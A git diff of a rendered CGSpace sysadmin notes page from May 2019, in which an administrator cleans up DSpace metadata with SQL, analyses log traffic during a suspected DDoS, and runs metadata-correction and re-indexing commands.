dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE 1074345
dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
dspace=# UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
UPDATE 14
</code></pre><ul>
<li>Then I exported the whole repository as CSV, imported it into OpenRefine, removed a few unneeded columns, exported it, zipped it down to 36MB, and emailed a link to Carlos</li>
@ -1299,15 +1299,15 @@ UPDATE 14
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -48,7 +48,7 @@ DELETE 1
But after this I tried to delete the item from the XMLUI and it is still present&hellip;
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -78,12 +78,12 @@ But after this I tried to delete the item from the XMLUI and it is still present
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -129,7 +129,7 @@ But after this I tried to delete the item from the XMLUI and it is still present
<p class="blog-post-meta">
<time datetime="2019-05-01T07:37:43+03:00">Wed May 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -145,7 +145,7 @@ But after this I tried to delete the item from the XMLUI and it is still present
</li>
<li>The item seems to be in a pre-submitted state, so I tried to delete it from there:</li>
</ul>
<pre><code>dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
<pre tabindex="0"><code>dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
DELETE 1
</code></pre><ul>
<li>But after this I tried to delete the item from the XMLUI and it is <em>still</em> present&hellip;</li>
@ -158,7 +158,7 @@ DELETE 1
</ul>
</li>
</ul>
<pre><code>dspace=# DELETE FROM metadatavalue WHERE resource_id=74648;
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_id=74648;
dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
dspace=# DELETE FROM item WHERE item_id=74648;
</code></pre><ul>
@ -168,12 +168,12 @@ dspace=# DELETE FROM item WHERE item_id=74648;
</ul>
</li>
</ul>
<pre><code>$ curl -f -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
curl: (22) The requested URL returned error: 401 Unauthorized
</code></pre><ul>
<li>The DSpace log shows the item ID (because I modified the error text):</li>
</ul>
<pre><code>2019-05-01 11:41:11,069 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item(id=77708)!
<pre tabindex="0"><code>2019-05-01 11:41:11,069 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item(id=77708)!
</code></pre><ul>
<li>If I delete that one I get another, making the list of item IDs so far:
<ul>
@ -202,7 +202,7 @@ curl: (22) The requested URL returned error: 401 Unauthorized
</ul>
</li>
</ul>
<pre><code>https://cgspace.cgiar.org/rest/collections/1179/items?limit=812&amp;expand=metadata
<pre tabindex="0"><code>https://cgspace.cgiar.org/rest/collections/1179/items?limit=812&amp;expand=metadata
</code></pre><h2 id="2019-05-03">2019-05-03</h2>
<ul>
<li>A user from CIAT emailed to say that CGSpace submission emails have not been working the last few weeks
@ -211,7 +211,7 @@ curl: (22) The requested URL returned error: 401 Unauthorized
</ul>
</li>
</ul>
<pre><code>$ dspace test-email
<pre tabindex="0"><code>$ dspace test-email
About to send test email:
- To: woohoo@cgiar.org
@ -255,11 +255,11 @@ Please see the DSpace documentation for assistance.
</ul>
</li>
</ul>
<pre><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
<pre tabindex="0"><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
</code></pre><ul>
<li>As well as this error in the logs:</li>
</ul>
<pre><code>Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
<pre tabindex="0"><code>Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
</code></pre><ul>
<li>Strangely enough, I <em>do</em> see the statistics-2018, statistics-2017, etc cores in the Admin UI&hellip;</li>
<li>I restarted Tomcat a few times (and even deleted all the Solr write locks) and at least five times there were issues loading one statistics core, causing the Atmire stats to be incomplete
@ -282,52 +282,52 @@ Please see the DSpace documentation for assistance.
<ul>
<li>The number of unique sessions today is <em>ridiculously</em> high compared to the last few days considering it&rsquo;s only 12:30PM right now:</li>
</ul>
<pre><code>$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-06 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-06 | sort | uniq | wc -l
101108
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-05 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-05 | sort | uniq | wc -l
14618
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-04 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-04 | sort | uniq | wc -l
14946
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-03 | sort | uniq | wc -l
6410
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-02 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-02 | sort | uniq | wc -l
7758
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-01 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-01 | sort | uniq | wc -l
20528
</code></pre><ul>
<li>The number of unique IP addresses from 2 to 6 AM this morning is already several times higher than the average for that time of the morning this past week:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
7127
# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '05/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E &#39;05/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1231
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '04/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E &#39;04/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1255
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '03/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E &#39;03/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1736
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '02/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E &#39;02/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1573
# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E '01/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E &#39;01/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1410
</code></pre><ul>
<li>Just this morning between the hours of 2 and 6 the number of unique sessions was <em>very</em> high compared to previous mornings:</li>
</ul>
<pre><code>$ cat dspace.log.2019-05-06 | grep -E '2019-05-06 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E &#39;2019-05-06 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
83650
$ cat dspace.log.2019-05-05 | grep -E '2019-05-05 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-05 | grep -E &#39;2019-05-05 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2547
$ cat dspace.log.2019-05-04 | grep -E '2019-05-04 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-04 | grep -E &#39;2019-05-04 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2574
$ cat dspace.log.2019-05-03 | grep -E '2019-05-03 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-03 | grep -E &#39;2019-05-03 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2911
$ cat dspace.log.2019-05-02 | grep -E '2019-05-02 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-02 | grep -E &#39;2019-05-02 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2704
$ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-01 | grep -E &#39;2019-05-01 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
3699
</code></pre><ul>
<li>Most of the requests were GETs:</li>
</ul>
<pre><code># cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E &quot;(GET|HEAD|POST|PUT)&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34;(GET|HEAD|POST|PUT)&#34; | sort | uniq -c | sort -n
1 PUT
98 POST
2845 HEAD
@ -336,19 +336,19 @@ $ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -
<li>I&rsquo;m not exactly sure what happened this morning, but it looks like some legitimate user traffic—perhaps someone launched a new publication and it got a bunch of hits?</li>
<li>Looking again, I see 84,000 requests to <code>/handle</code> this morning (not including logs for library.cgiar.org because those get HTTP 301 redirect to CGSpace and appear here in <code>access.log</code>):</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -c -o -E &quot; /handle/[0-9]+/[0-9]+&quot;
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -c -o -E &#34; /handle/[0-9]+/[0-9]+&#34;
84350
</code></pre><ul>
<li>But it would be difficult to find a pattern for those requests because they cover 78,000 <em>unique</em> Handles (ie direct browsing of items, collections, or communities) and only 2,492 discover/browse (total, not unique):</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E &quot; /handle/[0-9]+/[0-9]+ HTTP&quot; | sort | uniq | wc -l
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34; /handle/[0-9]+/[0-9]+ HTTP&#34; | sort | uniq | wc -l
78104
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E &quot; /handle/[0-9]+/[0-9]+/(discover|browse)&quot; | wc -l
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34; /handle/[0-9]+/[0-9]+/(discover|browse)&#34; | wc -l
2492
</code></pre><ul>
<li>In other news, I see some IP is making several requests per second to the exact same REST API endpoints, for example:</li>
</ul>
<pre><code># grep /rest/handle/10568/3703?expand=all rest.log | awk '{print $1}' | sort | uniq -c
<pre tabindex="0"><code># grep /rest/handle/10568/3703?expand=all rest.log | awk &#39;{print $1}&#39; | sort | uniq -c
3 2a01:7e00::f03c:91ff:fe0a:d645
113 63.32.242.35
</code></pre><ul>
@ -363,28 +363,28 @@ $ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -
<ul>
<li>The total number of unique IPs on CGSpace yesterday was almost 14,000, which is several thousand higher than previous day totals:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '06/May/2019' | awk '{print $1}' | sort | uniq | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E &#39;06/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
13969
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '05/May/2019' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E &#39;05/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
5936
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '04/May/2019' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E &#39;04/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
6229
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '03/May/2019' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E &#39;03/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
8051
</code></pre><ul>
<li>Total number of sessions yesterday was <em>much</em> higher compared to days last week:</li>
</ul>
<pre><code>$ cat dspace.log.2019-05-06 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
144160
$ cat dspace.log.2019-05-05 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-05 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
57269
$ cat dspace.log.2019-05-04 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-04 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
58648
$ cat dspace.log.2019-05-03 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-03 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
27883
$ cat dspace.log.2019-05-02 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-02 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
26996
$ cat dspace.log.2019-05-01 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-01 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
61866
</code></pre><ul>
<li>The usage statistics seem to agree that yesterday was crazy:</li>
@ -407,7 +407,7 @@ $ cat dspace.log.2019-05-01 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq |
</ul>
</li>
</ul>
<pre><code>$ dspace test-email
<pre tabindex="0"><code>$ dspace test-email
About to send test email:
- To: wooooo@cgiar.org
@ -423,9 +423,9 @@ Please see the DSpace documentation for assistance.
<li>Help Moayad with certbot-auto for Let&rsquo;s Encrypt scripts on the new AReS server (linode20)</li>
<li>Normalize all <code>text_lang</code> values for metadata on CGSpace and DSpace Test (as I had tested last month):</li>
</ul>
<pre><code>UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
<pre tabindex="0"><code>UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
</code></pre><ul>
<li>Send Francesca Giampieri from Bioversity a CSV export of all their items issued in 2018
<ul>
@ -454,7 +454,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
</li>
<li>All of the IPs from these networks are using generic user agents like this, but MANY more, and they change many times:</li>
</ul>
<pre><code>&quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36&quot;
<pre tabindex="0"><code>&#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36&#34;
</code></pre><ul>
<li>I found a <a href="https://www.qurium.org/alerts/azerbaijan/azerbaijan-and-the-region40-ddos-service/">blog post from 2018 detailing an attack from a DDoS service</a> that matches our pattern exactly</li>
<li>They specifically mention:</li>
@ -473,7 +473,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
<ul>
<li>I see that the Unpaywall bot is resonsible for a few thousand XMLUI sessions every day (IP addresses come from nginx access.log):</li>
</ul>
<pre><code>$ cat dspace.log.2019-05-11 | grep -E 'ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)' | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2019-05-11 | grep -E &#39;ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)&#39; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2206
</code></pre><ul>
<li>I added &ldquo;Unpaywall&rdquo; to the list of bots in the Tomcat Crawler Session Manager Valve</li>
@ -505,7 +505,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
<ul>
<li>Export a list of all investors (<code>dc.description.sponsorship</code>) for Peter to look through and correct:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-05-16-investors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-05-16-investors.csv WITH CSV HEADER;
COPY 995
</code></pre><ul>
<li>Fork the <a href="https://github.com/icarda-git/AReS">ICARDA AReS v1 repository</a> to <a href="https://github.com/ilri/AReS">ILRI&rsquo;s GitHub</a> and give access to CodeObia guys
@ -519,20 +519,20 @@ COPY 995
<li>Peter sent me a bunch of fixes for investors from yesterday</li>
<li>I did a quick check in Open Refine (trim and collapse whitespace, clean smart quotes, etc) and then applied them on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace-u dspace-p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace-u dspace-p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
</code></pre><ul>
<li>Then I started a full Discovery re-indexing:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>I was going to make a new controlled vocabulary of the top 100 terms after these corrections, but I noticed a bunch of duplicates and variations when I sorted them alphabetically</li>
<li>Instead, I exported a new list and asked Peter to look at it again</li>
<li>Apply Peter&rsquo;s new corrections on DSpace Test and CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
</code></pre><ul>
<li>Then I re-exported the sponsors and took the top 100 to update the existing controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/423">#423</a>)
<ul>
@ -564,7 +564,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dsp
</li>
<li>Generate Simple Archive Format bundle with SAFBuilder and import into the <a href="https://cgspace.cgiar.org/handle/10568/101106">AfricaRice Articles in Journals</a> collection on CGSpace:</li>
</ul>
<pre><code>$ dspace import -a -e me@cgiar.org -m 2019-05-25-AfricaRice.map -s /tmp/SimpleArchiveFormat
<pre tabindex="0"><code>$ dspace import -a -e me@cgiar.org -m 2019-05-25-AfricaRice.map -s /tmp/SimpleArchiveFormat
</code></pre><h2 id="2019-05-27">2019-05-27</h2>
<ul>
<li>Peter sent me over two thousand corrections for the authors on CGSpace that I had dumped last month
@ -573,16 +573,16 @@ $ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dsp
</ul>
</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t corrections -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t corrections -d
</code></pre><ul>
<li>Then start a full Discovery re-indexing on each server:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
